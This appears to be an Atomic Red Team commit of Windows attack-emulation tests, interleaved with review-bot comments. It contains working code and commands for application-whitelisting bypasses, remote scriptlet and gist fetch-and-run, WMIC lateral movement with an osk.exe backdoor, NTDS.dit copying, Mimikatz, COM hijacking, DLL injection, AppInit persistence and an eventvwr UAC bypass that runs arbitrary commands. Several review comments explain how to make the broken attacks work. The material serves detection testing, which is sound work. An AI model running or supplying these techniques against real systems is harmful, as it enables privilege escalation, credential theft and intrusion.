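Review bot: say which of the four commands need elevation: `regsvcs.exe` registers a COM+ application and writes to HKLM, so it fails from a standard user prompt, whereas `regasm.exe /U` reaches the `[ComUnregisterFunction]` method before its registry write is attempted and is the variant generally cited as working from a non-admin context. A line stating the expected observable (`calc.exe` launching, per the payload source) would also make pass/fail unambiguous.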


@ -0,0 +1,16 @@
## Regsvr32
MITRE ATT&CK Technique: [T1117](https://attack.mitre.org/wiki/Technique/T1117)
### Local Scriptlet Execution:
regsvr32.exe /s /u /i:file.sct scrobj.dll
### Remote Scriptlet Exection:
regsvr32.exe /s /u /i:http://example.com/file.sct scrobj.dll
## Test Script
[regsvr32.sct](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvr32.sct)


@ -0,0 +1,13 @@
## Rundll32
MITRE ATT&CK Technique: [T1085](https://attack.mitre.org/wiki/Technique/T1085)
### Executes an export inside of a dll.
rundll32 AllTheThings.dll,EntryPoint
## Test Script
[AlltheThings.dll](https://github.com/redcanaryco/atomic-red-team/tree/master/Windows/Payloads/AllTheThings)


@ -0,0 +1,12 @@
## Trusted Developer Utilities
MITRE ATT&CK Technique: [T1127](https://attack.mitre.org/wiki/Technique/T1127)
### MSBuild.exe - [Inline Tasks](https://msdn.microsoft.com/en-us/library/dd722601.aspx)
C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe File.csproj
## Test Script
[MSBuildBypass.csproj](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/MSBuildBypass.csproj)
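Review bot: only the 32-bit `Framework\v4.0.30319\MSBuild.exe` path is listed, while the InstallUtil and Regsvcs files give both `Framework` and `Framework64`; add the x64 path for consistency. The title uses `##` where the other files use `#`.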


@ -0,0 +1,45 @@
## Windows Management Instrumentation
MITRE ATT&CK Technique: [T1047](https://attack.mitre.org/wiki/Technique/T1047)
### Reconnaissance
Input:
wmic useraccount get /ALL
Input:
wmic process get caption,executablepath,commandline
Input:
wmic qfe get description,installedOn /format:csv
Input:
wmic /node:"192.168.0.1" service where (caption like "%sql server (%")
Input:
get-wmiobject class "win32_share" namespace "root\CIMV2" computer "targetname"
### Lateral Movement
Input:
wmic /user:<username> /password:<password> /node:<computer_name> process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
Input:
wmic /NODE: "192.168.0.1" process call create "evil.exe"
### Privileged Escalation
Input:
wmic /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt"
Input:
wmic /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"
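Review bot: `vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit` cannot work: `/for=` takes a volume (`/for=C:`), not a file, and redirecting vssadmin's console text does not copy the database. The working sequence is `vssadmin create shadow /for=C:` followed by `copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN\Windows\NTDS\NTDS.dit <dest>`; that is Credential Dumping on a domain controller, not privilege escalation. The `at` example in the same section has been deprecated in favour of `schtasks` since Windows 8 and no longer works on current builds. The `get-wmiobject class ... computer ...` line is missing its `-Class`/`-Namespace`/`-ComputerName` dashes, and "Privileged Escalation" should read "Privilege Escalation".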


@ -0,0 +1,15 @@
## Windows Admin Shares
MITRE ATT&CK Technique: [T1077](https://attack.mitre.org/wiki/Technique/T1077)
Input:
cmd.exe /c "net use \\<computer_name>\ipc$ P@ssw0rd1 /u:<domain>\Administrator"
Input:
cmd.exe /c "net use \\<computer_name>\admin$ P@ssw0rd1 /u:<domain>\Administrator"
Input:
cmd.exe /c "net use \\<computer_name>\c$ P@ssw0rd1 /u:<domain>\Administrator"


@ -0,0 +1,33 @@
## Windows Remote Management
MITRE ATT&CK Technique: [T1028](https://attack.mitre.org/wiki/Technique/T1028)
### Enable Windows Remote Management
Input:
powershell Enable-PSRemoting -Force
### Powershell lateral movement using the mmc20 application com object
Input:
powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","<computer_name>")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
Reference:
https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/
### WMIC Process Call Create
wmic /user:<username> /password:<password> /node:<computer_name> process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
### PowerSploit Invoke-Mimikatz WinRM
powershell-import /local/path/to/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1
powershell Invoke-Mimikatz -ComputerName TARGET
Reference:
https://blog.cobaltstrike.com/2015/07/22/winrm-is-my-remote-access-tool/
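Review bot: `.Documnet.ActiveView` is a typo for `.Document.ActiveView`; as written the MMC20 one-liner throws before it executes anything. That technique also travels over DCOM (TCP 135 plus a dynamic port), not WinRM, so it only loosely fits T1028; the linked post is explicit about that. The `powershell-import` and `powershell Invoke-Mimikatz -ComputerName TARGET` lines are Cobalt Strike Beacon console commands, not something you can paste into a Windows prompt; the file should say so and give the native equivalent (`. .\Invoke-Mimikatz.ps1; Invoke-Mimikatz -ComputerName TARGET`). The `WMIC Process Call Create` line duplicates the one in the Windows Management Instrumentation file.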

Binary file not shown.

Binary file not shown.


@ -0,0 +1,134 @@
using System;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
using System.EnterpriseServices;
// You will need Visual Studio and UnmanagedExports to build this binary
// Install-Package UnmanagedExports -Version 1.2.7
using RGiesecke.DllExport;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
For Testing Binary Application Whitelisting Controls
Includes 5 Known Application Whitelisting/ Application Control Bypass Techiniques in One File.
1. InstallUtil.exe
2. Regsvcs.exe
3. Regasm.exe
4. regsvr32.exe
5. rundll32.exe
Usage:
1.
x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.3031964\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
2.
x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll
x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll
3.
x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll
x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll
4.
regsvr32 /s /u AllTheThings.dll -->Calls DllUnregisterServer
regsvr32 /s AllTheThings.dll --> Calls DllRegisterServer
5.
rundll32 AllTheThings.dll,EntryPoint
*/
[assembly: ApplicationActivation(ActivationOption.Server)]
[assembly: ApplicationAccessControl(false)]
public class Program
{
public static void Main()
{
Console.WriteLine("Hello From Main...I Don't Do Anything");
//Add any behaviour here to throw off sandbox execution/analysts :)
}
}
public class Thing0
{
public static void Exec()
{
ProcessStartInfo startInfo = new ProcessStartInfo();
startInfo.FileName = "calc.exe";
Process.Start(startInfo);
}
}
[System.ComponentModel.RunInstaller(true)]
public class Thing1 : System.Configuration.Install.Installer
{
//The Methods can be Uninstall/Install. Install is transactional, and really unnecessary.
public override void Uninstall(System.Collections.IDictionary savedState)
{
Console.WriteLine("Hello There From Uninstall");
Thing0.Exec();
}
}
[ComVisible(true)]
[Guid("31D2B969-7608-426E-9D8E-A09FC9A51680")]
[ClassInterface(ClassInterfaceType.None)]
[ProgId("dllguest.Bypass")]
[Transaction(TransactionOption.Required)]
public class Bypass : ServicedComponent
{
public Bypass() { Console.WriteLine("I am a basic COM Object"); }
[ComRegisterFunction] //This executes if registration is successful
public static void RegisterClass(string key)
{
Console.WriteLine("I shouldn't really execute");
Thing0.Exec();
}
[ComUnregisterFunction] //This executes if registration fails
public static void UnRegisterClass(string key)
{
Console.WriteLine("I shouldn't really execute either.");
Thing0.Exec();
}
public void Exec() { Thing0.Exec(); }
}
class Exports
{
//
//
//rundll32 entry point
[DllExport("EntryPoint", CallingConvention = CallingConvention.StdCall)]
public static void EntryPoint(IntPtr hwnd, IntPtr hinst, string lpszCmdLine, int nCmdShow)
{
Thing0.Exec();
}
[DllExport("DllRegisterServer", CallingConvention = CallingConvention.StdCall)]
public static void DllRegisterServer()
{
Thing0.Exec();
}
[DllExport("DllUnregisterServer", CallingConvention = CallingConvention.StdCall)]
public static void DllUnregisterServer()
{
Thing0.Exec();
}
}
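Review bot: the comment on `[ComUnregisterFunction]` says it "executes if registration fails"; it actually runs on unregistration, i.e. for `regasm /U`, which is why the `/U` commands in the usage block work at all. The usage comment also has a typo in the x64 InstallUtil path (`v4.0.3031964` should be `v4.0.30319`), which someone will copy. `DllRegisterServer`/`DllUnregisterServer` are declared `void`, but regsvr32 reads an HRESULT from the return register, so a `/s` run reports whatever happens to be there; return `int` 0 (S_OK) to keep it deterministic. Finally, since `Main` and the constructor only print text, `calc.exe` appearing is the sole success signal; state that in the header comment.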


@ -0,0 +1,18 @@
REM X86
Executing X86 AllTheThings Test
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThingsx86.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThingsx86.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThingsx86.dll
regsvr32.exe /s /u AllTheThingsx86.dll
regsvr32.exe /s AllTheThingsx86.dll
rundll32 AllTheThingsx86.dll,EntryPoint
REM AMD64
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThingsx64.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThingsx64.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThingsx64.dll
regsvr32.exe /s /u AllTheThingsx64.dll
regsvr32.exe /s AllTheThingsx64.dll
rundll32 AllTheThingsx64.dll,EntryPoint
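Review bot: the second line, `Executing X86 AllTheThings Test`, is neither `REM` nor `echo`, so cmd tries to run a program called `Executing` and prints an error before continuing; prefix it with `echo` or `REM`, and give the AMD64 block a matching banner. Both DLLs go through all six loaders back to back, so the tester sees several `calc.exe` windows with no way to tell which loader produced which; an `echo` line naming each loader before it runs would make failures attributable.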


@ -0,0 +1,6 @@
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"="C:\\Tools\\MessageBox64.dll,C:\\Tools\\MessageBox32.dll"
"LoadAppInit_DLLs"=dword:00000001
"RequireSignedAppInit_DLLs"=dword:00000000
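Review bot: the .reg file hard-codes `C:\Tools\MessageBox64.dll` and `C:\Tools\MessageBox32.dll`, which appear nowhere else in this commit; add the DLLs under Payloads or say where they come from. It also sets `RequireSignedAppInit_DLLs` to 0, a system-wide weakening that persists after the test and needs an elevated import; ship a companion cleanup .reg as the scriptlet test does. Two caveats for readers: on Windows 8 and later with Secure Boot enabled, AppInit_DLLs loading is disabled regardless of these values, so the test silently does nothing there, and the file has no ATT&CK line (AppInit DLLs is T1103).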


@ -0,0 +1,22 @@
<?XML version="1.0"?>
<scriptlet>
<registration
description="AtomicRedTeam"
progid="AtomicRedTeam"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true"
>
</registration>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>
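Review bot: the processing instruction is written `<?XML version="1.0"?>`; scrobj.dll tolerates it, but standard XML parsers (linters, log pipelines, rule-authoring tools) reject an uppercase `XML` target, so `<?xml version="1.0"?>` is the safer spelling. The `classid` here (`{AAAA1111-...}`) is not the CLSID that COMHijack.reg registers (`{00000001-...}`), and `remotable="true"` is not needed for an in-process scriptlet; a one-line comment stating how this file relates to the `ScriptletURL` in COMHijack.reg would tie the two together, since as committed that .reg points elsewhere.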

View File

@ -0,0 +1,23 @@
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32]
@="C:\\WINDOWS\\system32\\scrobj.dll"
"ThreadingModel"="Apartment"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID]
@="AtomicRedTeam.1.00"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL]
@="https://gist.githubusercontent.com/subTee/91861699acaa1bd0da493c8a79035eb9/raw/bb38d92a543084207e0f14a1f2c4dde15db84659/AtomicRedTeam.sct"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}]
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}\TreatAs]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
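Review bot: `ScriptletURL` points at a raw gist on githubusercontent.com rather than the AtomicRedTeam.sct added in this commit, so the test needs network access and executes whatever that URL serves at run time; for a reproducible, offline test point it at the local file. The `TreatAs` value under `{372FCE38-4324-11D0-8810-00A0C903B83C}` is the actual redirection and is what a detection should key on (creation of `HKCU\Software\Classes\CLSID\<guid>\TreatAs`), but nothing in the commit documents which COM class that GUID is or why `certutil -CAInfo` instantiates it; that belongs on the Component Object Model Hijacking page.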

View File

@ -0,0 +1,5 @@
Windows Registry Editor Version 5.00
[-HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
[-HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam]
[-HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
[-HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}]
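Review bot: the cleanup deletes the whole `CLSID\{372FCE38-...}` key under HKCU, which also removes any per-user registration of that class that existed before the test, instead of only the `TreatAs` subkey that COMHijack.reg added. Suggest `[-HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}\TreatAs]` for that entry, or have the test batch export the key before the import so it can be restored exactly.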

View File

@ -0,0 +1,3 @@
reg import COMHijack.reg
certutil.exe -CAInfo
reg import COMHijackCleanup.reg
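Review bot: the batch does not check that `reg import COMHijack.reg` succeeded before running `certutil.exe -CAInfo`, so an import failure makes the test run certutil against the genuine COM object and report nothing; suggest `reg import COMHijack.reg || exit /b 1` and an `echo` before each step so the run log shows where it stopped. `reg import` resolves the filename against the current directory, so the script must be started from the COMHijackScripts folder (`%~dp0COMHijack.reg` removes that dependency).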

View File

@ -0,0 +1,84 @@
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;
// Source : http://www.codingvision.net/miscellaneous/c-inject-a-dll-into-a-process-w-createremotethread
// C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe DLLInjection.cs
// You will want to change target process, or dll name, depending on architecture.
// Sample DLL MessageBox Source From Here: https://github.com/enigma0x3/MessageBox . Thanks Matt ;-)
public class BasicInject
{
[DllImport("kernel32.dll")]
public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);
[DllImport("kernel32.dll", CharSet = CharSet.Auto)]
public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,
uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten);
[DllImport("kernel32.dll")]
static extern IntPtr CreateRemoteThread(IntPtr hProcess,
IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
// privileges
const int PROCESS_CREATE_THREAD = 0x0002;
const int PROCESS_QUERY_INFORMATION = 0x0400;
const int PROCESS_VM_OPERATION = 0x0008;
const int PROCESS_VM_WRITE = 0x0020;
const int PROCESS_VM_READ = 0x0010;
// used for memory allocation
const uint MEM_COMMIT = 0x00001000;
const uint MEM_RESERVE = 0x00002000;
const uint PAGE_READWRITE = 4;
public static int Main()
{
// the target process - I'm using a dummy process for this
// if you don't have one, open Task Manager and choose wisely
Process.Start("notepad");
Process targetProcess = Process.GetProcessesByName("notepad")[0];
// geting the handle of the process - with required privileges
IntPtr procHandle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, targetProcess.Id);
// searching for the address of LoadLibraryA and storing it in a pointer
IntPtr loadLibraryAddr = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
// name of the dll we want to inject
string dllName = "";
if(IntPtr.Size == 8)
{
dllName = "MessageBox64.dll";
}
else
{
dllName = "MessageBox32.dll";
}
// alocating some memory on the target process - enough to store the name of the dll
// and storing its address in a pointer
IntPtr allocMemAddress = VirtualAllocEx(procHandle, IntPtr.Zero, (uint)((dllName.Length + 1) * Marshal.SizeOf(typeof(char))), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
// writing the name of the dll there
UIntPtr bytesWritten;
WriteProcessMemory(procHandle, allocMemAddress, Encoding.Default.GetBytes(dllName), (uint)((dllName.Length + 1) * Marshal.SizeOf(typeof(char))), out bytesWritten);
// creating a thread that will call LoadLibraryA with allocMemAddress as argument
CreateRemoteThread(procHandle, IntPtr.Zero, 0, loadLibraryAddr, allocMemAddress, 0, IntPtr.Zero);
return 0;
}
}
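Review bot: none of the native calls check their results: `OpenProcess`, `VirtualAllocEx` and `CreateRemoteThread` can return `IntPtr.Zero`, `WriteProcessMemory` can return false, and the process handle is never closed (`CloseHandle` is not even imported), so a failed test gives no diagnostic and leaks a handle. `Process.GetProcessesByName("notepad")[0]` after `Process.Start("notepad")` may pick an unrelated, pre-existing notepad, or throw `IndexOutOfRangeException` if the new one has not registered yet; use the `Process` object that `Process.Start` returns. The buffer handed to `WriteProcessMemory` is `dllName.Length` bytes while `nSize` is `dllName.Length + 1`, so the terminating NUL is read from past the end of the managed array; build the buffer from `dllName + "\0"` so the size and the data agree. Comment typos: "geting", "alocating".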

Binary file not shown.

Binary file not shown.

View File

@ -0,0 +1,45 @@
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
Step One:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:InstallUtilBypass.exe InstallUtilBypass.cs
Step Two:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /U /logfile= /logtoconsole=false InstallUtilBypass.exe
*/
public class Program
{
public static void Main()
{
Console.WriteLine("Hey There From Main()");
//Add any behaviour here to throw off sandbox execution/analysts :)
//These binaries can exhibit one behavior when executed in sandbox, and entirely different one when invoked
//by InstallUtil.exe
}
}
[System.ComponentModel.RunInstaller(true)]
public class Sample : System.Configuration.Install.Installer
{
//The Methods can be Uninstall/Install. Install is transactional, and really unnecessary.
public override void Uninstall(System.Collections.IDictionary savedState)
{
Console.WriteLine("Hello There From Uninstall, If you are reading this, prevention has failed.");
}
}
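Review bot: `System.Net`, `System.Reflection` and `System.Runtime.InteropServices` are imported but unused, and `Uninstall` does not call `base.Uninstall(savedState)`, which the `Installer` base class expects overrides to do. The header documents the two build/run steps but not that `/U` is what routes execution to `Uninstall` rather than `Main`, which is the whole point of the test; a sentence saying so, and that the `Main` body is the behaviour a sandbox observes, would help whoever writes the detection for an `InstallUtil.exe /U` launch.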

View File

@ -0,0 +1,47 @@
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildBypass.csproj -->
<!-- Feel free to use a more aggressive class for testing. -->
<Target Name="Hello">
<FragmentExample />
<ClassExample />
</Target>
<UsingTask
TaskName="FragmentExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<ParameterGroup/>
<Task>
<Using Namespace="System" />
<Code Type="Fragment" Language="cs">
<![CDATA[
Console.WriteLine("Hello From a Code Fragment");
]]>
</Code>
</Task>
</UsingTask>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<!-- <Reference Include="System.IO" /> Example Include -->
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
public class ClassExample : Task, ITask
{
public override bool Execute()
{
Console.WriteLine("Hello From a Class.");
return true;
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>
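Review bot: `ClassExample : Task, ITask` lists `ITask` redundantly, since `Microsoft.Build.Utilities.Task` already implements it; `public class ClassExample : Task` is enough. The commented-out `<Reference Include="System.IO" />` and the empty `<ParameterGroup/>` are dead markup. Both tasks only write to the console, so the observable behaviour of this test is the `msbuild.exe` launch with a `.csproj` argument and the `csc.exe` compile that `CodeTaskFactory` triggers; the top comment could say so, since that is what a detection for this test keys on.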

View File

@ -0,0 +1,50 @@
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
Create Your Strong Name Key -> key.snk
From PowerShell.exe
Step One: Creates a Strong Name Key.
$key = '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'
$Content = [System.Convert]::FromBase64String($key)
Set-Content key.snk -Value $Content -Encoding Byte
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk RegSvcsRegaAsmBypass.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll
[OR]
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll
//Executes UnRegisterClass If you don't have permissions
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll
//This calls the UnregisterClass Method
*/
namespace regsvcser
{
public class Bypass : ServicedComponent
{
public Bypass() { Console.WriteLine("I am a basic COM Object"); }
[ComRegisterFunction] //This executes if registration is successful
public static void RegisterClass ( string key )
{
Console.WriteLine("I shouldn't really execute");
}
[ComUnregisterFunction] //This executes if registration fails
public static void UnRegisterClass ( string key )
{
Console.WriteLine("I shouldn't really execute either.");
}
}
}
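Review bot: the attribute comments contradict the header: `[ComUnregisterFunction]` is annotated "This executes if registration fails", while the build notes above correctly tie `UnRegisterClass` to the `/U` runs of regsvcs/regasm ("Executes UnRegisterClass If you don't have permissions"); the attribute marks the unregistration hook, not a failure path, so the comment should read `//This executes on unregistration (/U)`. The strong-name key is reconstructed from a fixed embedded string, so every build of this test carries the same public key token; worth stating in the header, since that token is a stable indicator for anyone writing detection for the test binary. The source filename in the csc step (`RegSvcsRegaAsmBypass.cs`) should be checked against the committed filename.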

View File

@ -0,0 +1,23 @@
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll -->
<!-- .sct files when downloaded, are executed from a path like this -->
<!-- Please Note, file extenstion does not matter -->
<!-- Though, the name and extension are arbitary.. -->
<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
<!-- Based on current research, no registry keys are written, since call "uninstall" -->
<!-- You can either execute locally, or from a url -->
<script language="JScript">
<![CDATA[
// calc.exe should launch, this could be any arbitrary code.
// What you are hoping to catch is the cmdline, modloads, or network connections, or any variation
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
</scriptlet>
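Review bot: the comments have spelling errors ("extenstion", "arbitary") and the sentence "no registry keys are written, since call \"uninstall\"" is unclear; suggest "no registry keys are written, because the /u flag drives the unregistration path". Here `<script>` is nested inside `<registration>`, the registration-time script form that the `/i` (DllInstall) invocation executes, while the other .sct in this commit puts `<script>` beside `<registration>` as an ordinary method script; a comment noting that difference would stop someone "fixing" one file to look like the other. As with the other scriptlet, `<?XML` should be `<?xml`.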

View File

@ -0,0 +1,92 @@
function Invoke-EventVwrBypass {
<#
.SYNOPSIS
Bypasses UAC by performing an image hijack on the .msc file extension
Expected to work on Win7, 8.1 and Win10
Only tested on Windows 7 and Windows 10
Author: Matt Nelson (@enigma0x3)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
Source: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
.PARAMETER Command
Specifies the command you want to run in a high-integrity context. For example, you can pass it powershell.exe followed by any encoded command "powershell -enc <encodedCommand>"
.EXAMPLE
Invoke-EventVwrBypass -Command "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc IgBJAHMAIABFAGwAZQB2AGEAdABlAGQAOgAgACQAKAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAnAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAJwApACkAIAAtACAAJAAoAEcAZQB0AC0ARABhAHQAZQApACIAIAB8ACAATwB1AHQALQBGAGkAbABlACAAQwA6AFwAVQBBAEMAQgB5AHAAYQBzAHMAVABlAHMAdAAuAHQAeAB0ACAALQBBAHAAcABlAG4AZAA="
This will write out "Is Elevated: True" to C:\UACBypassTest.
#>
[CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')]
Param (
[Parameter(Mandatory = $True)]
[ValidateNotNullOrEmpty()]
[String]
$Command,
[Switch]
$Force
)
$ConsentPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).ConsentPromptBehaviorAdmin
$SecureDesktopPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).PromptOnSecureDesktop
if($ConsentPrompt -Eq 2 -And $SecureDesktopPrompt -Eq 1){
"UAC is set to 'Always Notify'. This module does not bypass this setting."
exit
}
else{
#Begin Execution
$mscCommandPath = "HKCU:\Software\Classes\mscfile\shell\open\command"
$Command = $pshome + '\' + $Command
#Add in the new registry entries to hijack the msc file
if ($Force -or ((Get-ItemProperty -Path $mscCommandPath -Name '(default)' -ErrorAction SilentlyContinue) -eq $null)){
New-Item $mscCommandPath -Force |
New-ItemProperty -Name '(Default)' -Value $Command -PropertyType string -Force | Out-Null
}else{
Write-Warning "Key already exists, consider using -Force"
exit
}
if (Test-Path $mscCommandPath) {
Write-Verbose "Created registry entries to hijack the msc extension"
}else{
Write-Warning "Failed to create registry key, exiting"
exit
}
$EventvwrPath = Join-Path -Path ([Environment]::GetFolderPath('System')) -ChildPath 'eventvwr.exe'
#Start Event Viewer
if ($PSCmdlet.ShouldProcess($EventvwrPath, 'Start process')) {
$Process = Start-Process -FilePath $EventvwrPath -PassThru
Write-Verbose "Started eventvwr.exe"
}
#Sleep 5 seconds
Write-Verbose "Sleeping 5 seconds to trigger payload"
if (-not $PSBoundParameters['WhatIf']) {
Start-Sleep -Seconds 5
}
